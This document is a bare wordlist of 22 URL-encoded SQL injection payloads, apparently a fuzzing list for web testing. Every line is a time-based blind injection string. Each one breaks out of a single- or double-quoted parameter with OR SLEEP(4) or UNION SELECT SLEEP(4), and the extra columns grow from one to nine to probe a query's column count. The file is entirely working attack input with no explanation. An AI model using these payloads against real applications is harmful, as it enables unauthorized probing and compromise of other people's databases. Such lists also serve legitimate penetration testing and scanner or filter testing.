1%27%20OR%20SLEEP%284%29--%20
1%22%20OR%20SLEEP%284%29--%20
1%27%20UNION%20SELECT%20SLEEP%284%29--%20
1%22%20UNION%20SELECT%20SLEEP%284%29--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5%2C6--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5%2C6--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5%2C6%2C7--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5%2C6%2C7--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8--%20
1%27%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9--%20
1%22%20UNION%20SELECT%20SLEEP%284%29%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9--%20
